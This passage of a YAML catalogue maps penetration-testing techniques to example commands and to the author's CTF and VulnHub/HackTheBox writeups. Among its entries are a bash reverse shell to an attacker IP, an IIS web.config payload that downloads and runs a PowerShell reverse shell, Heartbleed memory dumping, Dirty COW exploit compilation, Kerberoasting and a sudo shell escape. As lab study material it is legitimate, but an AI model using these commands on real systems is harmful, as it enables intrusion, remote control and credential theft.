          - exploit_ssh_bruteforce
          - enumerate_proto_http
          - enumerate_app_wordpress
          - exploit_wordpress_plugin_hellodolly
          - exploit_php_reverseshell
          - privesc_cron
          - privesc_sudoers
          url: https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/
          verbose_id: vh#231
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf
      exploit_ssh_privatekeys:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20200810
          infra: VulnHub
          name: 'InfoSec Prep: OSCP'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png"
            width="100" height="100" />
          points: 10
          status: public
          tags:
          - enumerate_proto_http
          - exploit_ssh_privatekeys
          - privesc_lxc_bash
          url: https://www.vulnhub.com/entry/infosec-prep-oscp,508/
          verbose_id: vh#508
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf
      exploit_ssl_heartbleed:
        cli: 'nmap --script=ssl-heartbleed -p <targetport> <targetip>

          python $HOME/toolbox/scripts/heartbleed-poc/heartbleed-poc.py -n10 -f dump.bin
          <targetip> -p <targetport>

          strings dump.bin

          '
        description: use nmap nse script to confirm heartbleed vulnerability and then
          sensepost exploit to dump memory from target system
        references:
        - https://github.com/sensepost/heartbleed-poc
      exploit_wordpress_defaultcreds:
        cli: ''
        description: target system has wordpress configured with default credentials
          `admin/admin`
        references: []
        writeups:
        - datetime: 20190918
          infra: VulnHub
          name: 'hackfest2016: Quaoar'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_wordpress_defaultcreds
          - exploit_wordpress_plugin_hellodolly
          - exploit_php_reverseshell
          - privesc_mysql_creds
          - privesc_credsreuse
          url: https://www.vulnhub.com/entry/hackfest2016-quaoar,180/
          verbose_id: vh#180
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf
      exploit_wordpress_plugin:
        cli: ''
        description: certain wordpress installations might have a `/plugins/` directory
          that could provide source files or leak sensitive information
        references: []
        writeups:
        - datetime: 20191113
          infra: HackTheBox
          name: Blocky
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_wordpress_plugin
          - exploit_credsreuse
          - privesc_sudoers
          url: https://app.hackthebox.eu/machines/48
          verbose_id: htb#48
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf
      exploit_wordpress_plugin_activitymonitor:
        cli: ''
        description: wordpress plugin `Plainview Activity Monitor` is vulnerable to
          remote command injection
        references:
        - https://www.exploit-db.com/exploits/45274
        writeups:
        - datetime: 20190910
          infra: VulnHub
          name: 'DC: 6'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_wordpress_plugin_activitymonitor
          - privesc_mysql_creds
          - privesc_sudo
          - privesc_nmap
          url: https://www.vulnhub.com/entry/dc-6,315/
          verbose_id: vh#315
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf
      exploit_wordpress_plugin_hellodolly:
        cli: ''
        description: wordpress plugin `Hello Dolly` (default on stock wp installs)
          file `hello.php` is modified with php reverse shell code to gain interactive
          access on the target system
        references: []
        writeups:
        - datetime: 20190909
          infra: VulnHub
          name: 'BSides Vancouver: 2018 (Workshop)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_proto_ftp
          - enumerate_proto_ssh
          - exploit_ssh_bruteforce
          - enumerate_proto_http
          - enumerate_app_wordpress
          - exploit_wordpress_plugin_hellodolly
          - exploit_php_reverseshell
          - privesc_cron
          - privesc_sudoers
          url: https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/
          verbose_id: vh#231
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf
        - datetime: 20190918
          infra: VulnHub
          name: 'hackfest2016: Quaoar'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_wordpress_defaultcreds
          - exploit_wordpress_plugin_hellodolly
          - exploit_php_reverseshell
          - privesc_mysql_creds
          - privesc_credsreuse
          url: https://www.vulnhub.com/entry/hackfest2016-quaoar,180/
          verbose_id: vh#180
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf
      exploit_wordpress_template:
        cli: ''
        description: edit a wordpress template file, like `404.php` and add php reverse
          shell code within it to gain interactive access on the target system
        references: []
        writeups:
        - datetime: 20191029
          infra: VulnHub
          name: 'LazySysAdmin: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_smb_nullsession
          - exploit_smb_web_root
          - exploit_php_reverseshell
          - exploit_credsreuse
          - exploit_wordpress_template
          - privesc_sudo
          url: https://www.vulnhub.com/entry/lazysysadmin-1,205/
          verbose_id: vh#205
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf
    privesc:
      privesc_anansi:
        cli: "sudo /home/anansi/bin/anansi_util manual cat /etc/shadow\n  - (press\
          \ RETURN) !/bin/bash\n"
        description: the `anansi_util` application has `sudo` privileges. use it to
          run manual commands and upon error run `!/bin/bash` to execute root shell
        references: []
        writeups:
        - datetime: 20190831
          infra: VulnHub
          name: 'Brainpan: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png"
            width="100" height="100" />
          points: 40
          status: public
          tags:
          - exploit_bof
          - privesc_anansi
          - privesc_sudo
          url: https://www.vulnhub.com/entry/brainpan-1,51/
          verbose_id: vh#51
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf
      privesc_bash_reverseshell:
        cli: 'bash -i >& /dev/tcp/<attackerip>/<attackerport> 0>&1

          '
        description: bash reverse shell command
        references:
        - http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
        - https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells
        writeups:
        - datetime: 20190919
          infra: VulnHub
          name: 'hackfest2016: Sedna'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_php_fileupload
          - exploit_php_reverseshell
          - privesc_chkrootkit
          - privesc_cron
          - privesc_bash_reverseshell
          url: https://www.vulnhub.com/entry/hackfest2016-sedna,181/
          verbose_id: vh#181
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf
      privesc_bof:
        cli: ''
        description: craft exploit for the buffer overflow vulnerability to gain elevated
          privileges
        references: []
        writeups:
        - datetime: 20190926
          infra: VulnHub
          name: 'IMF: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png"
            width="100" height="100" />
          points: 40
          status: public
          tags:
          - exploit_php_fileupload_bypass
          - privesc_bof
          url: https://www.vulnhub.com/entry/imf-1,162/
          verbose_id: vh#162
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf
      privesc_chkrootkit:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20190919
          infra: VulnHub
          name: 'hackfest2016: Sedna'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_php_fileupload
          - exploit_php_reverseshell
          - privesc_chkrootkit
          - privesc_cron
          - privesc_bash_reverseshell
          url: https://www.vulnhub.com/entry/hackfest2016-sedna,181/
          verbose_id: vh#181
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf
      privesc_credsreuse:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20190918
          infra: VulnHub
          name: 'hackfest2016: Quaoar'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_wordpress_defaultcreds
          - exploit_wordpress_plugin_hellodolly
          - exploit_php_reverseshell
          - privesc_mysql_creds
          - privesc_credsreuse
          url: https://www.vulnhub.com/entry/hackfest2016-quaoar,180/
          verbose_id: vh#180
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf
      privesc_cron:
        cli: 'crontab -l

          cat /etc/crontab

          '
        description: leverage cronjobs to modify and execute `root` owned files
        references: []
        writeups:
        - datetime: 20191113
          infra: HackTheBox
          name: CronOS
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_sqli
          - privesc_cron
          url: https://app.hackthebox.eu/machines/11
          verbose_id: htb#11
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf
        - datetime: 20190905
          infra: VulnHub
          name: 'Billy Madison: 1.1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png"
            width="100" height="100" />
          points: 40
          status: public
          tags:
          - privesc_setuid
          - privesc_cron
          - privesc_sudoers
          url: https://www.vulnhub.com/entry/billy-madison-11,161/
          verbose_id: vh#161
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf
        - datetime: 20190909
          infra: VulnHub
          name: 'BSides Vancouver: 2018 (Workshop)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_proto_ftp
          - enumerate_proto_ssh
          - exploit_ssh_bruteforce
          - enumerate_proto_http
          - enumerate_app_wordpress
          - exploit_wordpress_plugin_hellodolly
          - exploit_php_reverseshell
          - privesc_cron
          - privesc_sudoers
          url: https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/
          verbose_id: vh#231
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf
        - datetime: 20190919
          infra: VulnHub
          name: 'hackfest2016: Sedna'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_php_fileupload
          - exploit_php_reverseshell
          - privesc_chkrootkit
          - privesc_cron
          - privesc_bash_reverseshell
          url: https://www.vulnhub.com/entry/hackfest2016-sedna,181/
          verbose_id: vh#181
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf
      privesc_cron_rootjobs:
        cli: 'pspy # find root owned processes, cronjobs

          find / -type f -mmin -60 -ls 2>/dev/null # look for recently modified files
          since a user may not be able to see cron jobs by root

          ./CheckcronJob.sh # find background processes

          '
        description: it would be useful to find `root` owned cronjob processes
        references:
        - https://www.reddit.com/r/oscp/comments/gb4k83/htb_bashed_and_my_learnings_oscp_journey/
        writeups:
        - datetime: 20200625
          infra: HackTheBox
          name: Bashed
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_proto_http
          - exploit_python_reverseshell
          - privesc_sudo
          - privesc_cron_rootjobs
          url: https://app.hackthebox.eu/machines/118
          verbose_id: htb#118
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf
      privesc_ctf_usertxt_timestamp:
        cli: 'ls -lh /home/<username>/user.txt

          '
        description: a neat trick for ctf boxes is to use `user.txt` file time as
          a reference to search for recently modified files
        references:
        - https://0x00sec.org/t/enumeration-for-linux-privilege-escalation/1959/19
      privesc_dirtycow:
        cli: 'wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c

          gcc -pthread -o dc dc.c -lcrypt

          ./dc

          '
        description: race condition that allows breakage of private read-only memory
          mappings
        references:
        - https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
      privesc_docker_group:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20191010
          infra: VulnHub
          name: 'Lin.Security: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_nfs_rw
          - exploit_ssh_authorizedkeys
          - privesc_strace_setuid
          - privesc_docker_group
          url: https://www.vulnhub.com/entry/linsecurity-1,244/
          verbose_id: vh#244
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf
      privesc_env_relative_path:
        cli: ''
        description: certain files when referenced without their complete path, can
          be misused to gain elevated privileges. this can be done by modifying the
          environment path to find the referenced file within a directory under attacker's
          control and placing a malicious binary within that directory with the same
          name as the referenced file
        references:
        - https://muirlandoracle.co.uk/2020/05/30/year-of-the-fox-write-up/
        writeups:
        - datetime: 20200730
          infra: TryHackMe
          name: Year of the Fox
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png"
            width="100" height="100" />
          points: null
          status: public
          tags:
          - enumerate_proto_http
          - exploit_command_injection
          - privesc_env_relative_path
          url: https://tryhackme.com/room/yotf
          verbose_id: tryhackme#yotf
          writeup: https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf
      privesc_freebsd:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20191009
          infra: VulnHub
          name: 'Kioptrix: 2014 (#5)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_pchart
          - exploit_phptax
          - privesc_freebsd
          url: https://www.vulnhub.com/entry/kioptrix-2014-5,62/
          verbose_id: vh#62
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf
      privesc_iis_webconfig:
        cli: "sample web.config:\n  <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n \
          \   <configuration>\n        <system.webServer>\n          <handlers accessPolicy=\"\
          Read, Script, Write\">\n             <add name=\"web_config\" path=\"*.config\"\
          \ verb=\"*\" modules=\"IsapiModule\" scriptProcessor=\"%windir%\\system32\\\
          inetsrv\\asp.dll\" resourceType=\"Unspecified\" requireAccess=\"Write\"\
          \ preCondition=\"bitness64\" />\n          </handlers>\n          <security>\n\
          \             <requestFiltering>\n                <fileExtensions>\n   \
          \                <remove fileExtension=\".config\" />\n                </fileExtensions>\n\
          \                <hiddenSegments>\n                   <remove segment=\"\
          web.config\" />\n                </hiddenSegments>\n             </requestFiltering>\n\
          \          </security>\n       </system.webServer>\n    </configuration>\n\
          \    <%@ Language=VBScript %>\n    <%\n      call Server.CreateObject(\"\
          WSCRIPT.SHELL\").Run(\"cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('<attackerip>/Invoke-PowerShellTcp.ps1')\"\
          )\n    %>\n"
        description: on iis servers, the web.config file stores configuration data
          for web applications (similar to .htaccess on apacher server). it can contain
          asp code which will be executed by the web server. use the powershell reverse
          shell from [nishang framework](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1)
          to get a call back from uploaded web.config file
        references:
        - https://0xdf.gitlab.io/2018/10/27/htb-bounty.html
      privesc_kerberos_kerberosting:
        cli: '# add entry for target system within /etc/hosts

          GetUserSPNs.py -request active.htb/SVC_TGS -outputfile ./adminticket

          john --format=krb5tgs --wordlist /usr/share/wordlists/rockyou.txt ./adminticket
          # does not work on john v1.8.0.6-jumbo-1-bleeding

          psexec.py administrator@active.htb

          '
        description: allows us to extract administrator tickets and crack those to
          obtain administrator password
        references:
        - https://0xrick.github.io/hack-the-box/active/
        - https://room362.com/post/2016/kerberoast-pt1/
        - https://room362.com/post/2016/kerberoast-pt2/
        - https://room362.com/post/2016/kerberoast-pt3/
      privesc_kernel_ipappend:
        cli: 'gcc -m32 -o exploit 9542.c -Wl,--hash-style=both

          '
        description: Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5/4.8 /
          Fedora Core 4/5/6 x86)
        references:
        - https://www.exploit-db.com/exploits/9542
        - https://nvd.nist.gov/vuln/detail/CVE-2009-2698
        writeups:
        - datetime: 20190928
          infra: VulnHub
          name: 'Kioptrix: Level 1.1 (#2)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_sqli
          - exploit_cmdexec
          - privesc_kernel_ipappend
          url: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
          verbose_id: vh#23
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf
      privesc_kernel_overlayfs:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20191010
          infra: VulnHub
          name: 'Lord Of The Root: 1.0.1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_sqli
          - exploit_credsreuse
          - privesc_kernel_overlayfs
          - privesc_mysql_root
          - privesc_mysql_udf
          url: https://www.vulnhub.com/entry/lord-of-the-root-101,129/
          verbose_id: vh#129
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf
      privesc_lxc_bash:
        cli: 'check output of id command

          if user is member of lxd group, follow https://reboare.github.io/lxd/lxd-escape.html

          '
        description: null
        references: []
        writeups:
        - datetime: 20200810
          infra: VulnHub
          name: 'InfoSec Prep: OSCP'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png"
            width="100" height="100" />
          points: 10
          status: public
          tags:
          - enumerate_proto_http
          - exploit_ssh_privatekeys
          - privesc_lxc_bash
          url: https://www.vulnhub.com/entry/infosec-prep-oscp,508/
          verbose_id: vh#508
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf
      privesc_modssl:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20190928
          infra: VulnHub
          name: 'Kioptrix: Level 1 (#1)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_modssl
          - privesc_modssl
          url: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
          verbose_id: vh#22
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf
      privesc_mysql_creds:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20190910
          infra: VulnHub
          name: 'DC: 6'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_wordpress_plugin_activitymonitor
          - privesc_mysql_creds
          - privesc_sudo
          - privesc_nmap
          url: https://www.vulnhub.com/entry/dc-6,315/
          verbose_id: vh#315
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf
        - datetime: 20190917
          infra: VulnHub
          name: 'Escalate_Linux: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_python_reverseshell
          - privesc_mysql_creds
          - privesc_setuid
          url: https://www.vulnhub.com/entry/escalate_linux-1,323/
          verbose_id: vh#323
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf
        - datetime: 20190918
          infra: VulnHub
          name: 'hackfest2016: Quaoar'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_wordpress_defaultcreds
          - exploit_wordpress_plugin_hellodolly
          - exploit_php_reverseshell
          - privesc_mysql_creds
          - privesc_credsreuse
          url: https://www.vulnhub.com/entry/hackfest2016-quaoar,180/
          verbose_id: vh#180
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf
      privesc_mysql_root:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20191008
          infra: VulnHub
          name: 'Kioptrix: Level 1.3 (#4)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_sqli
          - exploit_credsreuse
          - privesc_shell_escape
          - privesc_mysql_root
          - privesc_mysql_udf
          url: https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
          verbose_id: vh#25
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf
        - datetime: 20191010
          infra: VulnHub
          name: 'Lord Of The Root: 1.0.1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_sqli
          - exploit_credsreuse
          - privesc_kernel_overlayfs
          - privesc_mysql_root
          - privesc_mysql_udf
          url: https://www.vulnhub.com/entry/lord-of-the-root-101,129/
          verbose_id: vh#129
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf
      privesc_mysql_udf:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20191008
          infra: VulnHub
          name: 'Kioptrix: Level 1.3 (#4)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_sqli
          - exploit_credsreuse
          - privesc_shell_escape
          - privesc_mysql_root
          - privesc_mysql_udf
          url: https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
          verbose_id: vh#25
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf
        - datetime: 20191010
          infra: VulnHub
          name: 'Lord Of The Root: 1.0.1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_sqli
          - exploit_credsreuse
          - privesc_kernel_overlayfs
          - privesc_mysql_root
          - privesc_mysql_udf
          url: https://www.vulnhub.com/entry/lord-of-the-root-101,129/
          verbose_id: vh#129
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf
      privesc_nfs_norootsquash:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20190920
          infra: VulnHub
          name: 'HackLAB: Vulnix'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_nfs_rw
          - exploit_ssh_authorizedkeys
          - privesc_nfs_norootsquash
          - privesc_ssh_authorizedkeys
          url: https://www.vulnhub.com/entry/hacklab-vulnix,48/
          verbose_id: vh#48
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf
      privesc_nmap:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20190910
          infra: VulnHub
          name: 'DC: 6'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_wordpress_plugin_activitymonitor
          - privesc_mysql_creds
          - privesc_sudo
          - privesc_nmap
          url: https://www.vulnhub.com/entry/dc-6,315/
          verbose_id: vh#315
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf
        - datetime: 20191021
          infra: VulnHub
          name: 'Mr-Robot: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_php_reverseshell
          - privesc_setuid
          - privesc_nmap
          url: https://www.vulnhub.com/entry/mr-robot-1,151/
          verbose_id: vh#151
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf
      privesc_passwd_writable:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20191011
          infra: VulnHub
          name: 'Misdirection: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_php_webshell
          - exploit_bash_reverseshell
          - privesc_sudoers
          - privesc_passwd_writable
          url: https://www.vulnhub.com/entry/misdirection-1,371/
          verbose_id: vh#371
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf
      privesc_psexec_login:
        cli: 'psexec <username>@<targetip>

          '
        description: If credentials for an administrative user are available, we can
          use `psexec.py` to connect and gain elevated access to the target system.
        references: []
        writeups:
        - datetime: 20200428
          infra: HackTheBox
          name: Archetype
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png"
            width="100" height="100" />
          points: null
          status: public
          tags:
          - enumerate_proto_smb
          - enumerate_proto_smb_anonymous_access
          - enumerate_proto_sql
          - enumerate_proto_sql_ssis_dtsconfig
          - exploit_sql_login
          - exploit_sql_xpcmdshell
          - enumerate_app_powershell_history
          - privesc_psexec_login
          url: https://app.hackthebox.eu/machines/287
          verbose_id: htb#287
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf
      privesc_setuid:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20190905
          infra: VulnHub
          name: 'Billy Madison: 1.1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png"
            width="100" height="100" />
          points: 40
          status: public
          tags:
          - privesc_setuid
          - privesc_cron
          - privesc_sudoers
          url: https://www.vulnhub.com/entry/billy-madison-11,161/
          verbose_id: vh#161
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf
        - datetime: 20190917
          infra: VulnHub
          name: 'Escalate_Linux: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_python_reverseshell
          - privesc_mysql_creds
          - privesc_setuid
          url: https://www.vulnhub.com/entry/escalate_linux-1,323/
          verbose_id: vh#323
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf
        - datetime: 20190911
          infra: VulnHub
          name: 'FristiLeaks: 1.3'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_php_fileupload
          - exploit_php_fileupload_bypass
          - privesc_sudo
          - privesc_setuid
          url: https://www.vulnhub.com/entry/fristileaks-13,133/
          verbose_id: vh#133
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf
        - datetime: 20190927
          infra: VulnHub
          name: 'hackme: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_php_fileupload
          - exploit_php_reverseshell
          - privesc_setuid
          url: https://www.vulnhub.com/entry/hackme-1,330/
          verbose_id: vh#330
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf
        - datetime: 20191021
          infra: VulnHub
          name: 'Mr-Robot: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_php_reverseshell
          - privesc_setuid
          - privesc_nmap
          url: https://www.vulnhub.com/entry/mr-robot-1,151/
          verbose_id: vh#151
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf
        - datetime: 20191028
          infra: VulnHub
          name: 'Node: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_nodejs
          - exploit_credsreuse
          - exploit_mongodb
          - privesc_setuid
          url: https://www.vulnhub.com/entry/node-1,252/
          verbose_id: vh#252
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf
      privesc_shell_escape:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20191008
          infra: VulnHub
          name: 'Kioptrix: Level 1.3 (#4)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png"
            width="100" height="100" />
